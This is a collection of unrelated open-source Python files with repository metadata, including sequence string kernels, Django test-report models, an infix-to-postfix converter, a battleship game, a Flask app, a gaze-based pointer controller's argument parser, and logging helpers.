when y is None, y is set to be equal to x.
Parameters
----------
x : string
a row of the data matrix
y : string
a row of the data matrix
gamma: float, default is 1.
parameter require by gaussain process kernel.
l : int, default 3
number of l-mers (length of 'word')
j_x : int
start position of sequence in x
j_y : int
start position of sequence in y
d : int, default None
if None, set to the length of sequence
d is the length of analysed sequence
j + d is end position of sequence
Returns
-------
kernel_matrix : array of shape (n_samples_x, n_samples_y)
"""
if y is None:
y = x
x = inverse_label(x)
y = inverse_label(y)
if d is None:
d = len(x)
# sequence cannot pass the check
# x, y = check_pairwise_arrays(x, y)
phi_x, phi_y = phi(x, y, l, j_x, j_y, d)
return phi_x.dot(phi_y.T)
def mixed_spectrum_kernel_pw(x, y=None, gamma = 1.0, l = 3):
"""
Compute the mixed spectrum kernel between x and y:
k(x, y) = \sum_{d = 1}^{l} beta_d k_d^{spectrum}(x,y)
for each pair of rows x in X and y in Y.
when Y is None, Y is set to be equal to X.
beta_d = 2 frac{l - d + 1}{l^2 + 1}
Parameters
----------
X : array of shape (n_samples_X, )
each row is a sequence (string)
Y : array of shape (n_samples_Y, )
each row is a sequence (string)
gamma: float, default is 1.
parameter require by gaussain process kernel.
l : int, default 3
number of l-mers (length of 'word')
Returns
-------
kernel_matrix : array of shape (n_samples_X, n_samples_Y)
"""
if y is None:
y = x
k = 0
for d in range(1, l+1):
#print(d)
beta = 2 * float(l - d + 1)/float(l ** 2 + 1)
k += beta * spectrum_kernel_pw(x, y, l = d)
return k
def WD_kernel_pw(x, y=None, gamma = 1.0, l = 3):
"""Weighted degree kernel.
Compute the mixed spectrum kernel between x and y:
k(x, y) = \sum_{d = 1}^{l} \sum_j^{L-d}
beta_d k_d^{spectrum}(x[j:j+d],y[j:j+d])
for each pair of rows x in X and y in Y.
when Y is None, Y is set to be equal to X.
beta_d = 2 frac{l - d + 1}{l^2 + 1}
Parameters
----------
X : array of shape (n_samples_X, )
each row is a sequence (string)
Y : array of shape (n_samples_Y, )
each row is a sequence (string)
gamma: float, default is 1.
parameter require by gaussain process kernel.
l : int, default 3
number of l-mers (length of 'word')
Returns
-------
kernel_matrix : array of shape (n_samples_X, n_samples_Y)
"""
if y is None:
y = x
k = 0
# assume all seq has the same total length
L = len(x)
for d in range(1, l+1):
#print(d)
for j in range(0, L - d + 1):
beta = 2 * float(l - d + 1)/float(l ** 2 + 1)
k+= beta * spectrum_kernel_pw(x, y, l = d, j_x = j, j_y = j, d = d)
return k
def WD_shift_kernel_pw(x, y=None, gamma = 1.0, l = 3, shift_range = 1):
"""Weighted degree kernel with shifts.
Compute the mixed spectrum kernel between X and Y:
K(x, y) = \sum_{d = 1}^{l} \sum_j^{L-d} \sum_{s=0 and s+j <= L}
beta_d * gamma_j * delta_s *
(k_d^{spectrum}(x[j+s:j+s+d],y[j:j+d]) + k_d^{spectrum}(x[j:j+d],y[j+s:j+s+d]))
for each pair of rows x in X and y in Y.
when Y is None, Y is set to be equal to X.
beta_d = 2 frac{l - d + 1}{l^2 + 1}
gamma_j = 1
delta_s = 1/(2(s+1))
TODO: to confirm why shift useful?
Parameters
----------
X : array of shape (n_samples_X, )
each row is a sequence (string)
Y : array of shape (n_samples_Y, )
each row is a sequence (string)
gamma: float, default is 1.
parameter require by gaussain process kernel.
l : int, default 3
number of l-mers (length of 'word')
shift_range: int, default 1
number of shifting allowed
Returns
-------
kernel_matrix : array of shape (n_samples_X, n_samples_Y)
"""
if y is None:
y = x
k = 0
L = len(x) # assume all seq has the same total length
for d in range(1, l+1):
#print(d)
for j in range(0, L - d + 1):
for s in range(shift_range+1): # range is right open
if s + j <= L:
beta = 2 * float(l - d + 1)/float(l ** 2 + 1)
delta = 1.0/(2 * (s + 1))
k += beta * delta * (spectrum_kernel_pw(x, y, l = d, \
j_x = j+s, j_y = j,d = d) + \
spectrum_kernel_pw(x, y, l = d, j_x = j, j_y = j+s, d= d))
return k
| chengsoonong/eheye | SynBio/codes/kernels_pairwise.py | kernels_pairwise.py | py | 7,095 | python | en | code | 4 | github-code | 90 |
33392056432 | from django.db import models
# Create your models here.
class TempExtractData(models.Model): # 保存临时提出并转换后的数据
onlyCode = models.CharField('唯一随机ID', max_length=100, null=True)
keys = models.CharField('key', max_length=100, null=True)
values = models.TextField('value', null=True)
valueType = models.CharField('值类型', max_length=50, null=True)
createTime = models.DateTimeField('创建时间', auto_now=True)
class ApiTestReport(models.Model): # 一级主报告列表
pid = models.ForeignKey("ProjectManagement.ProManagement", to_field='id', on_delete=models.CASCADE)
reportName = models.CharField("报告名称", max_length=50, null=False)
reportType = models.CharField("报告类型(API:单接口,CASE:测试用例,TASK:定时任务,BATCH:批量任务)", max_length=10, null=False)
taskId = models.CharField("ApiId/CaseId/TaskId/BatchId,根据任务类型来取", max_length=10, null=False)
apiTotal = models.IntegerField("统计总需要执行的接口数量", null=False)
reportStatus = models.CharField("测试报告状态(Pass,Fail,Error)", max_length=10, null=False)
runningTime = models.FloatField("运行总时间", null=True)
createTime = models.DateTimeField('创建时间', auto_now=True)
updateTime = models.DateTimeField('修改时间', auto_now=True)
uid = models.ForeignKey(to='login.UserTable', to_field='id', on_delete=models.CASCADE) # 用户Id
is_del = models.IntegerField("是否删除(1:删除,0:不删除)", null=False)
class ApiReportTaskItem(models.Model): # 二级批量任务列表
testReport = models.ForeignKey("ApiTestReport", to_field='id', on_delete=models.CASCADE) # 主报告ID
task = models.ForeignKey("Api_TimingTask.ApiTimingTask", to_field='id', on_delete=models.CASCADE)
taskName = models.CharField("定时任务名称", max_length=50, null=True)
runningTime = models.FloatField("运行总时间", null=True)
successTotal = models.IntegerField("成功数", null=False)
failTotal = models.IntegerField("失败数", null=False)
errorTotal = models.IntegerField("错误数", null=False)
updateTime = models.DateTimeField('修改时间', auto_now=True)
is_del = models.IntegerField("是否删除(1:删除,0:不删除)", null=False)
class ApiReportItem(models.Model): # 二级报告列表
testReport = models.ForeignKey("ApiTestReport", to_field='id', on_delete=models.CASCADE) # 主报告ID
apiId = models.ForeignKey("Api_IntMaintenance.ApiBaseData", to_field='id', on_delete=models.CASCADE) # 接口ID
apiName = models.CharField("接口名称", max_length=50, null=True)
case_id = models.IntegerField("单接口没有此ID/Case,Task,Batch类型时这里显示CaseId", null=True) # 这个接口出自哪个用例的
batchItem_id = models.IntegerField("Batch类型时才有此ID", null=True)
runningTime = models.FloatField("运行总时间", null=True)
successTotal = models.IntegerField("成功数", null=False)
failTotal = models.IntegerField("失败数", null=False)
errorTotal = models.IntegerField("错误数", null=False)
updateTime = models.DateTimeField('修改时间', auto_now=True)
is_del = models.IntegerField("是否删除(1:删除,0:不删除)", null=False)
class ApiReport(models.Model): # 三级用例报告
reportItem = models.ForeignKey("ApiReportItem", to_field='id', on_delete=models.CASCADE) # 二级报告表ID
requestUrl = models.CharField('请求地址', max_length=100, null=False)
requestType = models.CharField("请求类型(GET/POST)", max_length=50, null=False)
requestHeaders = models.TextField('请求头部', null=True)
requestData = models.TextField('请求数据', null=True)
reportStatus = models.CharField("测试报告状态(Pass,Fail,Error)", max_length=10, null=False)
statusCode = models.IntegerField("返回代码", null=True)
responseHeaders = models.TextField('返回头部', null=True)
responseInfo = models.TextField('返回信息', null=True)
requestExtract = models.TextField('请求提取信息', null=True)
requestValidate = models.TextField('请求断言信息', null=True)
responseValidate = models.TextField('返回断言信息', null=True)
preOperationInfo = models.TextField('前置操作返回信息', null=True)
rearOperationInfo = models.TextField('后置操作返回值', null=True)
errorInfo = models.TextField('错误信息', null=True)
runningTime = models.CharField("运行总时间", max_length=50, null=True)
updateTime = models.DateTimeField('修改时间', auto_now=True)
is_del = models.IntegerField("是否删除(1:删除,0:不删除)", null=False)
class WarningInfo(models.Model): # 用于测试报告显示
testReport = models.ForeignKey("ApiTestReport", to_field='id', on_delete=models.CASCADE) # 主报告ID
triggerType = models.CharField("触发类型(Warning,Error)", max_length=20, null=False)
taskId = models.CharField("ApiId/CaseId/TaskId/BatchId,根据任务类型来取", max_length=10, null=False)
taskName = models.CharField("接口/用例/定时任务的名称", max_length=50, null=False)
info = models.TextField('信息', null=True)
updateTime = models.DateTimeField('修改时间', auto_now=True)
uid = models.ForeignKey(to='login.UserTable', to_field='id', on_delete=models.CASCADE) # 用户Id
class ApiQueue(models.Model): # 队列信息
pid = models.ForeignKey("ProjectManagement.ProManagement", to_field='id', on_delete=models.CASCADE)
page_id = models.IntegerField("所属页面", null=True)
fun_id = models.IntegerField("所属功能", null=True)
taskType = models.CharField('任务类型(API:单接口,Case,Task:定时任务,batch:批量任务)', max_length=50, null=False)
taskId = models.IntegerField("任务ID,apiId,CaseId,TaskId,BatchId", null=False)
testReport = models.ForeignKey("ApiTestReport", to_field='id', on_delete=models.CASCADE) # 主报告id
queueStatus = models.IntegerField("队列执行状态(0:未开始,1:执行中,2:已结束)", null=False)
updateTime = models.DateTimeField('修改时间', auto_now=True)
uid = models.ForeignKey(to='login.UserTable', to_field='id', on_delete=models.CASCADE) # 用户Id
| lipenglo/AutoTestingPlatform-v3 | BackService/Api_TestReport/models.py | models.py | py | 6,395 | python | en | code | 4 | github-code | 90 |
19019451145 | from collections import deque
class Solution:
def __init__ (self):
self.table = {
'^': 1,
'*': 2,
'/': 2,
'+': 3,
'-': 3,
'(': 4
}
def InfixtoPostfix (self, string):
stk, res = deque(), []
for ch in string:
if (not ch.isalpha()):
if (ch == ')'):
while ((stk) and (stk[-1] != '(')): res.append(stk.pop())
stk.pop()
elif (ch == '('): stk.append('(')
else:
while ((stk) and (self.table[stk[-1]] <= self.table[ch])): res.append(stk.pop())
stk.append(ch)
else: res.append(ch)
while (stk): res.append(stk.pop())
return "".join(res)
| Tejas07PSK/lb_dsa_cracker | Stacks & Queues/Arithmetic Expression evaluation/solution1.py | solution1.py | py | 807 | python | en | code | 2 | github-code | 90 |
709694375 | def linearRegression(px,py):
sumx = 0
sumy = 0
sumxy = 0
sumxx = 0
n = len (px)
for i in range(n):
x = px[i]
y = py[i]
sumx += x
sumy += y
sumxx += x*x
sumxy += x*y
a=(sumxy-sumx*sumy/n)/(sumxx-(sumx**2)/n)
b=(sumy-a*sumx)/n
print(sumx,sumy,sumxy,sumxx)
return a,b
x=[0,1,2,3,4]
y=[4,6,8,10,12]
#print(x.__len__())
a,b=linearRegression(x,y)
print(a,b)
#y=ax+b
| Varanasi-Software-Junction/pythoncodecamp | ml/AIML.py | AIML.py | py | 453 | python | en | code | 10 | github-code | 90 |
39629867919 | from setuptools import find_packages, setup
NAME = "silicium-web"
VERSION = "0.1.2"
URL = "https://github.com/SamimiesGames/silicium"
AUTHOR = "Samimies"
DESCRIPTION = "Silicium-web is a massive cookiecutter template library for building UI on the web with Python."
setup(
name=NAME,
version=VERSION,
url=URL,
author=AUTHOR,
license="MIT",
description=DESCRIPTION,
packages=find_packages(exclude=["tests", "*.tests", "*.tests.*", "tests.*"], where="src"),
package_dir={"": "src"}
)
| SamimiesGames/silicium-web | setup.py | setup.py | py | 519 | python | en | code | 0 | github-code | 90 |
7150409724 | import numpy as np
from constants import coord, lenTablero
class Jugador:
tablero = []
tablero_impactos = []
tablero_barcos = [] # Tablero para comprobar si un barco está hundido (no se visualiza)
def __init__(self, is_maquina, nombre): # es_maquina (bool)-> indica si es maquina o no ; nombre-> nombre del jugador
self.is_maquina = is_maquina
self.nombre = nombre
def initTablero(self): # Función para inicializar tableros
self.tablero = np.full((lenTablero,lenTablero), " ")
self.tablero_impactos = np.full((lenTablero,lenTablero), " ")
self.tablero_barcos = np.full((10,10),0)
def colocarBarcos(self, tamBarco, num): # Función para colocar barcos en tableros
def checkColision(tamBarco, x,y, orientacion):
t = tamBarco
colision = False
c1 = x
c2 = y
while t:
if((self.tablero[c1+coord[orientacion][0]-1, c2+coord[orientacion][1]-1]!= " ") and #casilla libre
#TODO bug casilla libre Left Right Up Down D1 D2 D3 D4 a lo largo del nuevo barco
# (((c1+coord[orientacion][0]-2 > -1) and (self.tablero[c1+coord[orientacion][0]-2, c2+coord[orientacion][1]-2]!= " ")) or ((c1+coord[orientacion][0]-1) == 0))and#D1 U-D
# (((c1+coord[orientacion][0]-2 > -1) and (self.tablero[c1+coord[orientacion][0]-2, c2+coord[orientacion][1]]!= " ")) or ((c1+coord[orientacion][0]-1) == 0))and#D2 U-I
# (((c1+coord[orientacion][0]-2 > -1) and (self.tablero[c1+coord[orientacion][0]+2, c2+coord[orientacion][1]]!= " ")) or ((c1+coord[orientacion][0]-1) == 0))and#D3 D-I
# (((c1+coord[orientacion][0]-2 > -1) and (self.tablero[c1+coord[orientacion][0]+2, c2+coord[orientacion][1]+2]!= " ")) or ((c1+coord[orientacion][0]-1) == 0))and#D4 D-D
(((c1+coord[orientacion][0]-2 > -1) and (self.tablero[c1+coord[orientacion][0]-2, c2+coord[orientacion][1]-1]!= " ")) or ((c1+coord[orientacion][0]-1) == 0))and#Up
(((c1+coord[orientacion][0]+2 < lenTablero) and (self.tablero[c1+coord[orientacion][0]+2, c2+coord[orientacion][1]-1]!= " " ) or ((c1+coord[orientacion][1]-1) < lenTablero)))and#Down
(((c1+coord[orientacion][1]-2 > -1) and (self.tablero[c1+coord[orientacion][0], c2+coord[orientacion][1]-2]!= " ")) or (c1+coord[orientacion][1]-1) == 0)and#Left
(((c1+coord[orientacion][1] < lenTablero) and (self.tablero[c1+coord[orientacion][0], c2+coord[orientacion][1]]!= " ")) or (c1+coord[orientacion][1]) == lenTablero)):#Right
colision = True
break
else:
c1 += coord[orientacion][0]
c2 += coord[orientacion][1]
if colision:
break
else:
t-=1
return colision
tam = tamBarco # Posicion inicial
while(num):
aOrientacion = ["N","S","E","O"]
num -=1
initPosition = False
while not initPosition:
x = np.random.randint(lenTablero)
y = np.random.randint(lenTablero)
if ((self.tablero[x,y] == " ") and
((((x+1 < lenTablero) and (self.tablero[x+1,y] == " ")) or (x+1 == lenTablero))) and
(((x-1 > -1) and (self.tablero[x-1,y] == " ") or (x == 0))) and
(((y+1 < lenTablero) and (self.tablero[x,y+1] == " ")) or (y + 1 == lenTablero))):# and
#(((y+1 < lenTablero) and (x+1 < lenTablero) and (self.tablero[x+1,y+1] == " ")) or (y+1 == lenTablero)) and#diagonal
#(((y-1 > -1) and (x+1 < lenTablero) and (self.tablero[x+1,y-1] == " "))or (y == 0)) and
#(((y-1 > -1) and (y-1 > -1) and (self.tablero[x-1,y-1] == " ")) or (y == 0)) and
#(((y+1 < lenTablero)and (x-1 > -1) and (self.tablero[x-1,y+1] == " ")))or (y+1 == lenTablero)):
self.tablero[x,y] = str(tam) + str(num)
initPosition = True
orientacion = aOrientacion[np.random.randint(len(aOrientacion))] # Elegir orientacion posible
imposible = True
colision = False
while imposible:
if (((x - tam > 0) and orientacion == "N") or
(((tam + x ) < lenTablero) and orientacion == "S") or
(((lenTablero - y ) >= tam) and orientacion == "E") or
(((y - tam) >= 0) and orientacion == "O")
):
#alguna coordenada es inicialmente valida
colision = checkColision(tam, x,y, orientacion)
if not colision:
imposible = False
if imposible and colision:
aOrientacion = ["N","S","E","O"]
#new init position
#borrar coordenada valida
initPosition = False
orientacion = aOrientacion[np.random.randint(len(aOrientacion))]
elif imposible:
orientacion = aOrientacion[np.random.randint(len(aOrientacion))]
#colocar barco
while tamBarco:
t = tamBarco -1
self.tablero[x+(coord[orientacion][0]*t), y+(t*coord[orientacion][1])] = tam
self.tablero_barcos[x+(coord[orientacion][0]*t), y+(t*coord[orientacion][1])] = str(tam) + str(num)
tamBarco-=1
tamBarco = tam
def getIndiceLetra(self,letra:str): # Función de utilidad para obtener el índice de una letra
return ord(letra.replace(" ", "").upper()) - 65
def incrementar_letra(letra): # función de utilidad para incremento progresivo
return chr(ord(letra)+1)
def mostrarTableros(self): # Función que muestra ambos tableros de juego
print("\n", f" Tablero de barcos: Tablero de impactos:", "\n")
self.imprimir_tablero(self.tablero, self.tablero_impactos, True)
def imprimir_fila_de_numeros(self): # Funcion que crea dos filas de numeros consecutivas de los tableros del jugador
fila_de_numeros_doble = "| "
for x in range(10):
if x == 9:
fila_de_numeros_doble += f"| {x+1}"
else:
fila_de_numeros_doble += f"| {x+1} "
fila_de_numeros_doble += "| | "
for x in range(10):
if x == 9:
fila_de_numeros_doble += f"| {x+1}"
else:
fila_de_numeros_doble += f"| {x+1} "
fila_de_numeros_doble += "|"
print(fila_de_numeros_doble)
def imprimir_separador_horizontal(self): # Funcion que crea los separadores horizontales de los tableros del jugador
separador_doble = ""
for _ in range(11):
separador_doble += "+---"
separador_doble += "+ "
for _ in range(11):
separador_doble += "+---"
separador_doble += "+"
print(separador_doble)
# IMPRESION TABLEROS SIDE BY SIDE (cacharreo con codigo de aida)
# matriz_barcos: Numpy.ndarray con digitos que representa los barcos
# matriz_impactos: Numpy.Array que representa los impactos en el contrario
# deberia_mostrar_barcos: Booleano que representa si se deberían imprimirse barcos
def imprimir_tablero(self, matriz_barcos, matriz_impactos, deberia_mostrar_barcos): # Función que imprime dos tableros side by side
for y, letra in enumerate(["A","B","C","D","E","F","G","H","I","J"]):
self.imprimir_separador_horizontal()
m_barcos_string: str = f"| {letra} "
m_impactos_string: str = f"| {letra} "
for x in range(10):
celda_barco = matriz_barcos[y][x]
celda_impactos = matriz_impactos[y][x]
if not deberia_mostrar_barcos and celda_barco != " " and celda_barco != "-" and celda_barco != "X":
celda_barco = " "
if celda_barco.isdigit():
celda_barco = "O"
if not (not deberia_mostrar_barcos) and celda_impactos != " " and celda_impactos != "-" and celda_impactos != "X":
celda_impactos = " "
m_barcos_string += f"| {celda_barco} "
m_impactos_string += f"| {celda_impactos} "
m_barcos_string += "|"
m_impactos_string += "|"
print( m_barcos_string + " " + m_impactos_string )
self.imprimir_separador_horizontal()
self.imprimir_fila_de_numeros()
self.imprimir_separador_horizontal()
def getDisparo(self, x, y): # Función que comprueba las coordenadas insertadas por el usuario y actualiza el tablero de impactos
res = ""
if isinstance(x,str):
if(x.isdigit()):
x = int(x)
else:
x = self.getIndiceLetra(x) # En teoría los valores x e y ya están filtrados
y = int(y)
if self.tablero[x,y] == "O" or self.tablero[x,y].isdigit():
if self.todosHundidos():
res = "fin de juego"
elif self.barcoHundido(x,y):
res = "XX"
elif self.barcoTocado(x,y):
res = "X"
else:
res = "-"
self.tablero[x,y] = res # Devuelve esta variable para ir cambiando de turno en la clase Game
return res
def setDisparo(self, x, y, res): # Función que actualiza las coordenadas en el tablero_impacto
self.tablero_impactos[x,y] = res
def barcoHundido(self, x, y): # Expresión booleana para identificar un barco tocado y hundido - crear diccionario / clase barcos
if (len(self.tablero_barcos[self.tablero_barcos == self.tablero_barcos[x,y]]) <= 1):
print(f" * Barco de {self.tablero[x,y]} posiciones hundido *")
self.tablero_barcos[x,y] = 0
return len(self.tablero_barcos[self.tablero_barcos == self.tablero_barcos[x,y]]) <= 1
def barcoTocado(self, x, y): # Expresión booleana para que identificar un barco tocado
return self.tablero[x,y] == "O" or self.tablero[x,y].isdigit()
def todosHundidos(self): # Expresión booleana para que identificar que todos los barcos han sido hundido s
return len(np.where( self.tablero == "O")) == 0
| marinagoju/Battleship | src/utilsJugador.py | utilsJugador.py | py | 11,180 | python | es | code | 0 | github-code | 90 |
29919618899 | import unittest
from unittest import TestCase
from crawler.core.downloader import Downloader
class TestDownloader(TestCase):
def test_downloader_page(self):
url = "https://baike.baidu.com/item/Python/407313"
content = Downloader.downloader_page(url)
self.assertIsNotNone(content)
if __name__ == '__main__':
unittest.main()
| EasonAndLily/SimpleCrawler | crawler/test/test_downloader.py | test_downloader.py | py | 361 | python | en | code | 1 | github-code | 90 |
72290728618 | """
Specify custom location for the tree plot file
"""
from cmdstanpy import CmdStanModel
from tarpan.cmdstanpy.tree_plot import save_tree_plot
from tarpan.shared.info_path import InfoPath
def run_model():
model = CmdStanModel(stan_file="eight_schools.stan")
data = {
"J": 8,
"y": [28, 8, -3, 7, -1, 1, 18, 12],
"sigma": [15, 10, 16, 11, 9, 11, 10, 18]
}
fit = model.sample(data=data, chains=4, cores=4, seed=1,
sampling_iters=1000, warmup_iters=1000)
# Change all path components:
# ~/tarpan/analysis/model1/normal.png
save_tree_plot([fit],
info_path=InfoPath(
path='~/tarpan',
dir_name="analysis",
sub_dir_name="model1",
base_name="normal",
extension="png"
))
# Change the file name:
# model_into/custom_location/my_summary.pdf
save_tree_plot([fit],
info_path=InfoPath(base_name="my_summary"))
# Change the file type:
# model_into/custom_location/summary.png
save_tree_plot([fit],
info_path=InfoPath(extension="png"))
# Change the sub-directory name:
# model_into/custom/summary.pdf
save_tree_plot([fit],
info_path=InfoPath(sub_dir_name="custom"))
# Do not create sub-directory:
# model_into/summary.pdf
save_tree_plot([fit],
info_path=InfoPath(sub_dir_name=InfoPath.DO_NOT_CREATE))
# Change the default top directory name from `model_info`:
# my_files/custom_location/summary.pdf
save_tree_plot([fit],
info_path=InfoPath(dir_name='my_files'))
# Change the root path to "tarpan" in your user's home directory
# ~/tarpan/model_info/custom_location/summary.pdf
save_tree_plot([fit],
info_path=InfoPath(path='~/tarpan'))
if __name__ == '__main__':
run_model()
print('We are done')
| evgenyneu/tarpan | docs/examples/save_tree_plot/a03_custom_location/custom_location.py | custom_location.py | py | 2,039 | python | en | code | 2 | github-code | 90 |
23623805703 | from flask import Flask, render_template
import user_story
app = Flask(__name__)
@app.route('/')
def index():
user_stories = user_story.get_user_stories()
headers = user_story.get_headers()
return render_template("index.html", stories=user_stories, headers=headers)
if __name__ == '__main__':
app.run() | UltraViolet5/new-flusk-demo | app.py | app.py | py | 324 | python | en | code | 0 | github-code | 90 |
7351134991 | import pandas as pd
def main():
df = pd.read_csv('data.csv')
df = df.sort_values(by=['score'], ascending=False)
df = df.reset_index(drop=True)
df.to_csv('sort.csv', index=False)
if __name__ == '__main__':
main() | LaurenceYang1218/13csnight | sort.py | sort.py | py | 246 | python | en | code | 2 | github-code | 90 |
22662995 | #!/usr/bin/env python3
#############################################################################################################
#
# Computer Pointer Controller Main Script
#
#############################################################################################################
'''
Computer Pointer Controller:
This is the main script for the running all the code and the functions. The computer pointer takes the input parameter.
Input Arguments:
1. Model-01 -> Face Detection Model
2. Model-02 -> Head Pose Estimation Model
3. Model-03 -> Landmark Detection Model
4. Model-04 -> Gaze Estimator Model
5. Input (Video or Webcam) -> media file in .mp4 or CAM
6. Device -> 'CPU', 'GPU', 'FPGA', 'MYRIAD', 'HETERO', 'HDDL'
7. Flags -> Show if enabled option for models
8. Resolution -> Width and Height (Optional)
Output Arguments:
1. Media -> Output on screen and save file
2. timelapse -> video time inference in fps with seconds
3. Samples -> Output of the model outcome as per the Flags initiated
4. perf_stats -> Statics of the inference backend
'''
# load the library
# load the system libary
import os.path as osp
import sys
import time
# load numerical operation library
import numpy as np
from math import cos, sin, pi
# load the log librarys
import logging as log
# load OpenCV library
import cv2
# load the Argument Parser for user input
from argparse import ArgumentParser
# load the model and input feeder library (custom)
from utils.ie_module import Inference_Context
from utils.helper import cut_rois, resize_input
from src.face_detection import Face_Detection
from src.head_position_estimation import Head_Pose_Estimator
from src.landmark_detection import Landmarks_Detection
from src.gaze_Estimator import Gaze_Estimation
from src.mouse_controller import Mouse_Controller_Pointer
from src.mouse_process import Mouse_Controller
# load the OpenVINO library
from openvino.inference_engine import IENetwork
# Set the Device operation types
DEVICE_KINDS = ['CPU', 'GPU', 'FPGA', 'MYRIAD', 'HETERO', 'HDDL']
def build_argparser():
"""
Parse command line arguments.
-i bin/demo.mp4
-m_fd <path>models/intel/face-detection-adas-binary-0001/FP32-INT1/face-detection-adas-binary-0001.xml
-d_fd { 'CPU', 'GPU', 'FPGA', 'MYRIAD', 'HETERO', 'HDDL'}
-o_fd
-m_hp <path>models/intel/head-pose-estimation-adas-0001/FP16/head-pose-estimation-adas-0001.xml
-d_hp {'CPU', 'GPU', 'FPGA', 'MYRIAD', 'HETERO', 'HDDL'}
-o_hp
-m_lm <path>mo_model/intel/landmarks-regression-retail-0009/FP16/landmarks-regression-retail-0009.xml
-d_lm {'CPU', 'GPU', 'FPGA', 'MYRIAD', 'HETERO', 'HDDL'}
-o_lm
-m_gm <path>mo_model/intel/gaze-estimation-adas-0002/FP16/gaze-estimation-adas-0002.xml
-d_gm {'CPU', 'GPU', 'FPGA', 'MYRIAD', 'HETERO', 'HDDL'}
-o_gm
-o <path>results/outcome<num>
-pc
:return: command line arguments
"""
parser = ArgumentParser()
parser.add_argument("-i", "--input", required=True, type=str,
help="Path to image or video file in .mp4 format or enter CAM for webcam")
parser.add_argument("-m_fd", "--model_face_detection", required=True, type=str,
help="Path to load an .xml file with a trained Face Detection model")
parser.add_argument('-d_fd', default='CPU', choices=DEVICE_KINDS,
help="(optional) Target device for the " \
"Face Detection model device selection (default: %(default)s)")
parser.add_argument('-t_fd', metavar='[0..1]', type=float, default=0.4,
help="(optional) Set the Probability threshold for face detections" \
"(default: %(default)s)")
parser.add_argument('-o_fd', action='store_true',
help="(optional) Process the face detection output")
parser.add_argument("-m_hp", "--model_head_position", required=True, type=str,
help="Path to load an .xml file with a trained Head Pose Estimation model")
parser.add_argument('-d_hp', default='CPU', choices=DEVICE_KINDS,
help="(optional) Target device for the " \
"Head Position model (default: %(default)s)")
parser.add_argument('-o_hp', action='store_true',
help="(optional) Show Head Position output")
parser.add_argument("-m_lm", "--model_landmark_regressor", required=True, type=str,
help="Path to load an .xml file with a trained Head Pose Estimation model")
parser.add_argument('-d_lm', default='CPU', choices=DEVICE_KINDS,
help="(optional) Target device for the " \
"Facial Landmarks Regression model (default: %(default)s)")
parser.add_argument('-o_lm', action='store_true',
help="(optional) Show Landmark detection output")
parser.add_argument("-m_gm", "--model_gaze", required=True, type=str,
help="Path to an .xml file with a trained Gaze Estimation model")
parser.add_argument('-d_gm', default='CPU', choices=DEVICE_KINDS,
help="(optional) Target device for the " \
"Gaze estimation model (default: %(default)s)")
parser.add_argument('-o_gm', action='store_true',
help="(optional) Show Gaze estimation output")
parser.add_argument('-o_mc', action='store_true',
help="(optional) Run mouse counter")
parser.add_argument('-pc', '--perf_stats', action='store_true',
help="(optional) Output detailed per-layer performance stats")
parser.add_argument('-exp_r_fd', metavar='NUMBER', type=float, default=1.20,
help="(optional) Scaling ratio for bboxes passed to face recognition " \
"(default: %(default)s)")
parser.add_argument('-cw', '--crop_width', default=0, type=int,
help="(optional) Crop the input stream to this width " \
"(default: no crop). Both -cw and -ch parameters " \
"should be specified to use crop.")
parser.add_argument('-ch', '--crop_height', default=0, type=int,
help="(optional) Crop the input stream to this width " \
"(default: no crop). Both -cw and -ch parameters " \
"should be specified to use crop.")
parser.add_argument('-v', '--verbose', action='store_true',
help="(optional) Be more verbose")
parser.add_argument('-l', '--cpu_lib', metavar="PATH", default="",
help="(optional) For MKLDNN (CPU)-targeted custom layers, if any. " \
"Path to a shared library with custom layers implementations")
parser.add_argument('-c', '--gpu_lib', metavar="PATH", default="",
help="(optional) For clDNN (GPU)-targeted custom layers, if any. " \
"Path to the XML file with descriptions of the kernels")
parser.add_argument('-tl', '--timelapse', action='store_true',
help="(optional) Auto-pause after each frame")
parser.add_argument('-o', '--output', metavar="PATH", default="",
help="(optional) Path to save the output video to directory")
return (parser)
##########################################################################################################
def main():
args = build_argparser().parse_args()
log.basicConfig(format="[ %(levelname)s ] %(asctime)-15s %(message)s",
level=log.INFO if not args.verbose else log.DEBUG, stream=sys.stdout)
driverMonitoring = Mouse_Controller(args)
driverMonitoring.run(args)
if __name__ == "__main__":
main() | Nitin-Mane/Computer-Pointer-Controller | main.py | main.py | py | 8,101 | python | en | code | 0 | github-code | 90 |
33409339837 | import os
import logging
from logging import Logger, Formatter, Handler, FileHandler, StreamHandler
from tqdm import tqdm
from typing import Iterable, Optional, List, Dict, Union
import torch.distributed as dist
from .distributed import is_master
def get_logger(name: Optional[str] = None) -> Logger:
logger = logging.getLogger(name)
if name is None:
logging.basicConfig(
format="[%(asctime)s %(levelname)s] %(message)s",
datefmt="%Y-%m-%d %H:%M:%S",
handlers=[TqdmHandler()]
)
return logger
def init_logger(logger: Logger,
log_file: Optional[str] = None,
level: int = logging.INFO,
non_master_level: int = logging.ERROR,
mode: str = 'w',
handlers: Optional[Iterable[Handler]] = None,
verbose: bool = True) -> Logger:
if not handlers:
if log_file:
os.makedirs(os.path.dirname(log_file) or './', exist_ok=True)
logger.addHandler(FileHandler(log_file, mode))
for handler in logger.handlers:
handler.setFormatter(ColoredFormatter(colored=not isinstance(handler, FileHandler)))
if verbose:
logger.setLevel(level if is_master() else non_master_level)
return logger
def print_log(msg: str, logger: Optional[Logger] = None, level: int = logging.INFO) -> None:
if logger is None:
print(msg)
elif isinstance(logger, Logger):
logger.log(level, msg)
elif logger == "silent":
pass
else:
raise TypeError(f"Logger should be either a logging.Logger object, 'silent' or None, "
f"but got {type(logger)}.")
def log_line(logger: Optional[Logger] = None, lens: int = 81, level: int = logging.INFO) -> None:
msg = '-' * lens
print_log(msg=msg, logger=logger, level=level)
def log_message(msg: str, logger: Optional[Logger] = None, level: int = logging.INFO) -> None:
lines = msg.split('\n')
for line in lines:
if line.strip():
print_log(msg=line, logger=logger, level=level)
def log_table(table: Union[Dict, List[Dict]],
columns: Optional[List] = None,
logger: Optional[Logger] = None,
level: int = logging.INFO) -> None:
# parse table head
if isinstance(table, Dict):
table = [table]
if not columns:
columns = list(table[0].keys() if table else [])
p_list = [columns] # 1st row = header
# parse table line
for item in table:
p_list.append([str(item[col] or '') for col in columns])
# format table
# maximun size of the col for each element
col_size = [max(map(len, col)) for col in zip(*p_list)]
# insert seperating line before every line, and extra one for ending
for i in range(0, len(p_list) + 1)[::-1]:
p_list.insert(i, ['-' * i for i in col_size])
# two format for each content line and each seperating line
format_edg = "---".join(["{{:<{}}}".format(i) for i in col_size])
format_str = " | ".join(["{{:<{}}}".format(i) for i in col_size])
